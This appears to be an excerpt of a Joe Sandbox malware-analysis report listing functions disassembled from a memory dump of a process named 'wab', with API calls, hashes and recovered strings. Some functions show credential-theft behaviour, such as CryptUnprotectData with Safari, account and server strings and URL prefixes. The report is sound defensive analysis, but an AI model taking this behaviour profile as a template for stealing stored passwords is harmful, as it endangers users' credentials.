                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                            APIs
                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                            APIs
                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                            APIs
                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                            APIs
                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                            APIs
                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                            • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                            APIs
                                            • memset.MSVCRT ref: 004095FC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                            • String ID:
                                            • API String ID: 3655998216-0
                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                            APIs
                                            • memset.MSVCRT ref: 00445426
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                            • String ID:
                                            • API String ID: 1828521557-0
                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                            APIs
                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastRead
                                            • String ID:
                                            • API String ID: 2136311172-0
                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                            APIs
                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@
                                            • String ID:
                                            • API String ID: 1936579350-0
                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                            APIs
                                            • EmptyClipboard.USER32 ref: 004098EC
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                            • GlobalFix.KERNEL32(00000000), ref: 00409927
                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                            • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                            • GetLastError.KERNEL32 ref: 0040995D
                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                            • GetLastError.KERNEL32 ref: 00409974
                                            • CloseClipboard.USER32 ref: 0040997D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                            • String ID:
                                            • API String ID: 2565263379-0
                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                            APIs
                                            • EmptyClipboard.USER32 ref: 00409882
                                            • wcslen.MSVCRT ref: 0040988F
                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                            • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                            • memcpy.MSVCRT ref: 004098B5
                                            • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                            • CloseClipboard.USER32 ref: 004098D7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                            • String ID:
                                            • API String ID: 2014503067-0
                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                            APIs
                                            • GetLastError.KERNEL32 ref: 004182D7
                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                            • LocalFree.KERNEL32(?), ref: 00418342
                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                            • String ID: OsError 0x%x (%u)
                                            • API String ID: 403622227-2664311388
                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            • String ID:
                                            • API String ID: 1865533344-0
                                            • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                            • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                            • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                            • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                            APIs
                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: NtdllProc_Window
                                            • String ID:
                                            • API String ID: 4255912815-0
                                            • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                            • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                            • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                            APIs
                                            • _wcsicmp.MSVCRT ref: 004022A6
                                            • _wcsicmp.MSVCRT ref: 004022D7
                                            • _wcsicmp.MSVCRT ref: 00402305
                                            • _wcsicmp.MSVCRT ref: 00402333
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                            • memset.MSVCRT ref: 0040265F
                                            • memcpy.MSVCRT ref: 0040269B
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • memcpy.MSVCRT ref: 004026FF
                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                            • API String ID: 2929817778-1134094380
                                            • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                            • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                            • String ID: :stringdata$ftp://$http://$https://
                                            • API String ID: 2787044678-1921111777
                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                            • GetDC.USER32 ref: 004140E3
                                            • wcslen.MSVCRT ref: 00414123
                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                            • _snwprintf.MSVCRT ref: 00414244
                                            • SetWindowTextW.USER32(?,?), ref: 00414258
